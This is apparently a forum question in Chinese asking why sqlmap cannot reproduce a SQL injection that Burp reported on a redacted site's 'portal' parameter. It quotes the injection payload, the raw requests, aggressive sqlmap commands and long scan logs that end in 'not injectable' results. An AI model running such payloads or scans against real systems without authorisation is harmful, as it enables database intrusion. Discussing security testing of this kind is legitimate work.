我在使用 Burp 扫描站点时进行站点调查,它返回该站点易受 sql 注入攻击,但我无法使用 sqlmap 重现它
问题详细信息 portal 参数似乎容易受到 SQL 注入攻击。有效载荷 65254334 或 6399=06399-- 在门户参数中提交,并返回数据库错误消息。您应该查看错误消息的内容以及应用程序对其他输入的处理,以确认是否存在漏洞。
该数据库似乎是 MySQL。
包括在 burp 中找到的请求以及一些 SQLmap 会话的输出。
我在做什么错?有人能帮我吗?
这些是使用的命令 sqlmap -r portal.req --force-ssl --dbs --time-sec 8 sqlmap -r base.req --force-ssl --dbs --batch --random-agent sqlmap -r portal.req --force-ssl --dbms mysql --time-sec 8 --level 5 --risk 3 --random-agent --batch
一切都以相同的结果“无”结束
Issue Request
GET /site/media/nl/portal.js?portal=165254334%20or%206399%3d06399--
%20&_=_1123222212290099896yx261lkjxq1222 HTTP/1.1
Host: myxxxxxx.xxxxx.xxxx.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
Referer: https://myxxxx.xxxx.xxxx.com/login/
Cookie: PHPSESSID=Removed; ASP.NET_SessionId=Removed;
sfcProduct=Removed
Base Request
GET /site/media/nl/portal.js?
portal=1&_=_1123222212290099896yx261lkjxq1222 HTTP/1.1
Host: myxxxxx.xxxxxx.xxxxxx.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
Referer: https://myxxxxx.xxxxx.xxxxxx.com/login/
Cookie: PHPSESSID=Removed; ASP.NET_SessionId=Removed;
sfcProduct=Removed
[11:18:41] [INFO] parsing HTTP request from 'portal.req'
[11:18:42] [WARNING] it appears that you have provided tainted parameter
values ('portal=165254334 or 6399=06399-- ') with most likely leftover
chars/statements from manual SQL injection test(s). Please, always use
only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have probl
ems)? [y/N] y
[11:18:45] [INFO] testing connection to the target URL
[11:18:45] [WARNING] there is a DBMS error found in the HTTP response
body which could interfere with the results of the tests
[11:18:45] [INFO] testing if the target URL content is stable
[11:18:47] [INFO] target URL content is stable
[11:18:47] [INFO] testing if GET parameter 'portal' is dynamic
[11:18:47] [INFO] GET parameter 'portal' appears to be dynamic
[11:18:48] [INFO] heuristic (basic) test shows that GET parameter
'portal' might be injectable (possible DBMS: 'MySQL')
[11:18:48] [INFO] heuristic (XSS) test shows that GET parameter 'portal'
might be vulnerable to cross-site scripting (XSS) attacks
[11:18:48] [INFO] testing for SQL injection on GET parameter 'portal'
for the remaining tests, do you want to include all tests for 'MySQL'
extending provided level (1) and risk (1) values? [Y/n] y
[11:18:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
clause'
[11:18:56] [WARNING] reflective value(s) found and filtering out
[11:19:00] [INFO] testing 'Boolean-based blind - Parameter replace
(original value)'
[11:19:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
clause (MySQL comment)'
[11:19:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
clause (MySQL comment)'
[11:19:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:19:38] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:20:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:20:24] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:20:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:21:18] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:21:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:22:10] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:22:35] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[11:22:36] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[11:22:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[11:22:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[11:22:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[11:22:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[11:22:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:22:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:22:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:22:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:22:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[11:22:54] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[11:22:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:23:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:23:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:23:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:23:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:24:12] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:24:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:24:43] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:24:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:25:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:25:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:25:44] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:25:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:26:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[11:26:28] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:26:35] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:26:45] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:26:45] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:26:46] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:26:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:26:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:26:47] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:26:47] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[11:26:47] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[11:26:48] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[11:26:49] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:26:49] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[11:26:50] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[11:26:50] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:26:51] [INFO] testing 'MySQL inline queries'
[11:26:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:26:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:27:08] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[11:27:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[11:27:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:27:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:27:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:27:56] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:28:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:28:23] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:28:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:28:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:28:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:29:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:29:12] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[11:29:26] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[11:29:41] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[11:29:52] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[11:30:01] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:30:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:30:26] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:30:41] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:30:50] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:31:04] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:31:21] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:31:30] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:31:41] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:31:51] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:31:56] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:31:57] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:31:57] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[11:31:57] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:31:57] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:31:58] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:31:58] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[11:31:59] [INFO] testing 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[12:12:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:12:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[12:13:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[12:13:47] [WARNING] GET parameter 'portal' does not seem to be injectable
[12:13:47] [INFO] testing if GET parameter '_' is dynamic
[12:13:48] [WARNING] GET parameter '_' does not appear to be dynamic
[12:13:48] [INFO] heuristic (basic) test shows that GET parameter '_' might be injectable (possible DBMS: 'MySQL')
[12:13:48] [INFO] testing for SQL injection on GET parameter '_'
[12:13:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:13:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:13:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:13:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:14:11] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:14:58] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[12:14:58] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[12:15:03] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:15:17] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[12:15:29] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[12:15:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[12:15:59] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[12:16:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[12:16:31] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[12:16:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[12:16:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[12:16:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[12:16:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[12:16:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[12:16:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[12:16:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[12:16:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[12:16:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[12:16:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[12:16:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[12:16:59] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[12:16:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:17:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:17:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:17:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:18:00] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:18:18] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:18:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:18:53] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:19:39] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:21:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:21:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:21:53] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:22:12] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:22:37] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:22:55] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:23:07] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:23:21] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:23:21] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:23:21] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:23:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:23:22] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:23:22] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:23:22] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[12:23:23] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[12:23:24] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[12:23:24] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:23:26] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[12:23:26] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[12:23:27] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:23:28] [INFO] testing 'MySQL inline queries'
[12:23:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:23:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:23:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[12:24:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[12:24:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:24:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:24:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:24:52] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[12:25:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[12:25:35] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[12:26:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[12:26:37] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[12:26:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[12:27:07] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[12:27:21] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[12:27:37] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[12:27:52] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[12:28:02] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[12:28:11] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[12:28:26] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[12:28:36] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[12:28:50] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[12:29:00] [INFO] testing 'MySQL AND time-based blind (ELT)'
[12:29:14] [INFO] testing 'MySQL OR time-based blind (ELT)'
[12:29:28] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[12:29:37] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[12:29:47] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:29:57] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:30:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[12:30:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[12:30:03] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[12:30:03] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[12:30:03] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[12:30:04] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[12:30:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[12:30:04] [INFO] testing 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
[12:30:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:30:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[12:30:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[12:30:49] [WARNING] GET parameter '_' does not seem to be injectable
[12:30:49] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[12:30:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5304 times
_________________________________________________________________________
[15:10:13] [INFO] parsing HTTP request from 'base.req'
[15:10:14] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.10' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[15:10:14] [INFO] testing connection to the target URL
[15:10:22] [INFO] testing if the target URL content is stable
[15:10:31] [INFO] target URL content is stable
[15:10:31] [INFO] testing if GET parameter 'portal' is dynamic
[15:10:31] [WARNING] GET parameter 'portal' does not appear to be dynamic
[15:10:39] [WARNING] heuristic (basic) test shows that GET parameter 'portal' might not be injectable
[15:10:52] [INFO] testing for SQL injection on GET parameter 'portal'
[15:10:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:11:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:11:28] [WARNING] reflective value(s) found and filtering out
[15:11:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:11:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:11:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:12:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:12:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:12:22] [INFO] testing 'MySQL inline queries'
[15:12:22] [INFO] testing 'PostgreSQL inline queries'
[15:12:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:12:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:12:23] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:12:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:12:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:12:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:12:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:12:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:13:01] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[15:13:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:13:27] [WARNING] user aborted during detection phase
[15:14:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:15:30] [WARNING] GET parameter 'portal' does not seem to be injectable
[15:15:30] [INFO] testing if GET parameter '_' is dynamic
[15:15:33] [WARNING] GET parameter '_' does not appear to be dynamic
[15:15:35] [WARNING] heuristic (basic) test shows that GET parameter '_' might not be injectable
[15:15:43] [INFO] testing for SQL injection on GET parameter '_'
[15:15:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:16:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:16:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:16:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:16:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:16:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:17:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:17:09] [INFO] testing 'MySQL inline queries'
[15:17:12] [INFO] testing 'PostgreSQL inline queries'
[15:17:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:17:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:17:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:17:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:17:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:17:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:17:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:17:42] [INFO] testing 'Oracle AND time-based blind'
[15:17:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:18:11] [WARNING] GET parameter '_' does not seem to be injectable
[15:18:11] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[15:18:11] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 7 times